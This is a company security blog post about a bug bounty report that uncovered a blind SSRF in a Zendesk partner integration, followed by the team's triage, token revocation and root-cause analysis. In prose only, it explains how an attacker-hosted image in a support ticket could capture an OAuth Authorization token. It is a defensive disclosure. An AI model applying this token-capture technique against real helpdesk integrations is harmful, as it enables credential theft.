Blog home
SECURITY
FEB 10, 2021
Collaboration Defeats Third-Party Risk
In modern organizations, third-party risk is always present. It’s nearly impossible to avoid, and challenging to detect and mitigate. We wanted to share a few details around a recent occurrence at Gemini that highlights the opaque nature of third-party risk and underscores the importance of cross-team and cross-company collaboration.
What is third-party risk? Simply put, it is the additional attack surface created by the use of software and services not owned by your company. Does your code include dependencies that your developers didn't write? That's third-party risk. How many SaaS products do your HR and recruiting teams use? That's third-party risk.
Third-party risk is often seen as just a part of doing business, because it is. You would be hard-pressed to find companies that build their own custom recruiting software purely for internal use. That's because integrating third-party products, despite the cost of the service and increased risk, still outweighs the time, money, and effort required to create and maintain the "wheel" you've just reinvented.
So, if third-party risk is a necessary evil in order to do business in 2021, how do you get a handle on it? At Gemini, we determine the inherent risk of third-party service providers and group them into tiers based on our Procurement and Vendor Management Policy. Gemini assesses certain tiers of vendors through a risk assessment process that may include review of relevant certification documents, questionnaires, and technical reports. The ultimate goal is to understand any potential risks and if or how they can be mitigated.
Detecting actual threats and truly understanding risk can be challenging. As we will explain, sometimes when it comes to third-party risk, more than three are invited to the party. Here we discuss how Gemini collaborated with multiple internal and external parties to detect, identify, and quickly resolve a recent issue.
Detecting and Assessing the Threat
It started with a bug report that came in through our private bug bounty program. In the submission, the researcher reported they had found a “Blind XSS” that disclosed a Zendesk administrator’s Authorization token.
As we began triaging the report, we noticed several interesting details:
- The proof of concept provided by the researcher did not include a cross-site scripting (XSS) payload, just an HTML img tag with a Burp Collaborator URL as the src attribute.
- The same-origin policy would prevent the user viewing the payload from sending the Authorization header in the request to fetch the image.
- The User-Agent in the request was ‘python-requests/2.22.0’.
We quickly realized that this wasn’t a blind XSS, it was a blind SSRF! We attempted to reproduce the issue following the steps provided by the researcher but were initially unsuccessful.
We contacted the researcher and worked closely with them while we continued attempting to reproduce the issue. Internally, we notified our Threat Detection and Response (TDR) team to help coordinate communication and attempt to determine if the issue had been exploited by any malicious parties. The Customer Support (CS) team was also notified to provide expertise and administrative access to our Zendesk account.
About 30 minutes after initially attempting to reproduce the issue we received a response from our earlier testing. Sure enough it contained what appeared to be an Authorization token. The good news was that we were able to reproduce the reported issue, but why was there such a long delay?
Working With External Partners
After determining that the token contained in the response was a Zendesk OAuth token we quickly disabled it — just in case the token had been accessed by anyone other than the researcher we were working with. We were also able to identify the owner of the token; a Zendesk integration partner. Our CS team explained that they use this integration to help track their performance within Zendesk.
Out of an abundance of caution, we immediately disabled the Zendesk partner integration and contacted the partner’s security team. The team promptly responded and quickly set a time to meet and discuss the details. We had a productive and efficient call, and within hours a fix had been rolled out. We also continued to communicate with the researcher who originally reported the issue.
Due Diligence and Root Cause Analysis
Once the fix was in place, we took a step back to better understand the issue. Based on discussions with the partner’s security team, our CS team, and a bit of research, we learned exactly how the issue presented itself. To put it succinctly, it was a flaw in a third-party integration to a third-party service used by Gemini.
Every 30 minutes or so, the service would authenticate to Gemini’s Zendesk instance to read and parse any new support tickets. During the parsing process, the service would fetch URLs, images and other assets that appeared in the ticket. The problem was, the “Authorization” header was set for not only authenticated assets, but anything that required an HTTP request, such as an image. As a result, an attacker could obtain the token by creating a support ticket with an image hosted on a server they controlled. When the service attempted to fetch the image from the attacker-controlled server, it would set the HTTP Authorization header with the Authorization token, which the attacker could capture in their web server logs.
We continued to work closely with the partner’s security team as well as Zendesk in order to determine the entire scope of the leak. We obtained logs from multiple sources both external and internal. We also worked closely with our TDR and CS teams to determine how the access token was used and if any customer data was exposed. We were able to determine conclusively that the issue had not been exploited by anyone except for the researcher who originally notified us. At this point, we were comfortable re-enabling the Zendesk partner integration so our CS team could continue to use the service.
Third-party risk will often present itself in unexpected ways. It is not feasible to attempt to mitigate every eventuality. Be prepared for the unexpected, rely on your internal teams, hope for the best with external partners, and “reduce the blast radius” whenever possible.
While the root cause of this issue was not technically complicated, the multiple degrees of separation and the number of internal and external teams involved made for a challenging triage and response process. Despite this challenge, and with the help of some truly excellent external partners, this issue came to an efficient and safe conclusion.
Onward and Upward!
Gemini Product Security Team
RELATED ARTICLES
WEEKLY MARKET UPDATE
NOV 21, 2024
Bitcoin Hits All-Time High After BTC ETF Options Debut, Memecoins Make Moves, and MicroStrategy Continues To Surge
DERIVATIVES
NOV 20, 2024
Introducing Five New Perpetual Contracts on Gemini’s Derivatives Platform: BOME/GUSD, GOAT/GUSD, MEW/GUSD, PNUT/GUSD, POL/GUSD
INDUSTRY
NOV 19, 2024